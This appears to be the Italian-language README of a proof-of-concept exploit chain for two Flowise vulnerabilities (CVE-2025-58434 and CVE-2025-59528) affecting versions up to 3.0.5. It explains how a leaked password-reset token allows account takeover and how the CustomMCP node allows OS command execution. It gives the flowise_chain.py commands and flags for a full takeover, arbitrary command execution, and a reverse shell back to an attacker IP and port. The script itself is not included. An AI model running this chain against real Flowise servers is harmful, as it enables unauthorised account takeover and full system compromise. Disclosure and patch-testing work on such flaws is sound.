
CVE-2025-58434 e CVE-2025-59528 catena di POC
Catena di exploit per due vulnerabilità che interessano Flowise <= 3.0.5.
L'endpoint di recupero password restituisce un token valido per il reset della password nella risposta API senza richiedere autenticazione. Un attaccante a conoscenza di un indirizzo email valido può reimpostare la password di qualsiasi account senza interazione da parte dell'utente.
Il nodo CustomMCP passa input controllato dall'utente direttamente a un costruttore Function() con pieni privilegi Node.js. Un utente autenticato con una chiave API valida può eseguire comandi arbitrari del sistema operativo come utente del processo Flowise.
Corretto in: Flowise 3.0.6
pip install requestsCatena ATO completa (reimposta la password, richiede la chiave API, avvia una reverse shell):
python3 flowise_chain.py -t http://target -e [email protected]
Solo RCE (se hai già una chiave API):
python3 flowise_chain.py -t http://target --api-key <KEY> -c "id"
Reverse shell con chiave esistente:
python3 flowise_chain.py -t http://target --api-key <KEY> --lhost 10.0.0.1 --lport 4444
| Flag | Descrizione |
|---|---|
-t, --target | URL del target |
-e, --email | Email dell'account target (attiva la catena ATO) |
--api-key | Fornisci direttamente la chiave API (salta ATO) |
-c, --command | Comando da eseguire |
--lhost | IP dell'attaccante per reverse shell |
--lport | Porta dell'attaccante per reverse shell (default: 4444) |
--new-password | Password da impostare durante il reset (default: Pwn3d!2026) |
-k, --insecure | Salta la verifica TLS |
A causa di una peculiarità in Flowise 3.0.5, l'endpoint API di reset password non aggiorna immediatamente la credenziale accettata dall'endpoint di login. Lo script si mette in pausa dopo il reset e ti chiede di accedere manualmente all'interfaccia utente e copiare la chiave API da /apikey.